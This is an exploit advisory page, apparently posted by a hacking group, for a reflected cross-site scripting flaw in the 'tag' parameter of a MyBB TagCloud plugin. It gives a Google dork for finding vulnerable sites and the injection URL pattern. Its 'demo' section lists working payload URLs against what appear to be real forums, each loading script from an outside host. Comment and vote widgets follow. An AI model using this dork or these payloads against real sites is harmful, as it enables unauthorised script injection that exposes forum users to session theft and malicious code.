MyBb simple TagCloud Plugin XSS Vulnerability

2014.01.13

Credit: Offensive

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: intext:Simple TagCloud Plugin by Kupo v 0.9a

[+] Exploit Title: MyBb simple TagCloud Plugin XSS Vulnerability
[+] Discovered By: Offensive
[+] Author: Attacker Security Team [http://attacker-team.org]
[+] Find : 14/7/2013
[+] public date: 12/1/2014
[+] Category: WebApp
[+] Google Dork: intext:Simple TagCloud Plugin by Kupo v 0.9a
[+] Tested On: Windows
[+] Site: Attacker-team.org
#######################################################################################
# Note :
# Its a XSS Vulnerability of MyBb simple TagCloud Plugin
# exploit:
# http://Site.com/{path}/tags.php?tag=[XSS]
########################################################################################
+Demo:
[*] http://bmwX-diag.pl/tags.php?tag="><script src=//msdesigner.ir/dir/ex.htm></script>
[*] forum.khoXderzae.com/tags.php?tag="><script src=//msdesigner.ir/dir/ex.htm></script>
########################################################################################
Greets to: Rooter - Hex - Hamoon pars - Anonymous
Attacker Security Team Members: Virangar , MR.MOJTABA , D@ni , Gold___Hat , ArmiN_C , Alireza_rusher
Thanks To : Medrik
########################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MyBb simple TagCloud Plugin XSS Vulnerability

Dork: intext:Simple TagCloud Plugin by Kupo v 0.9a

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.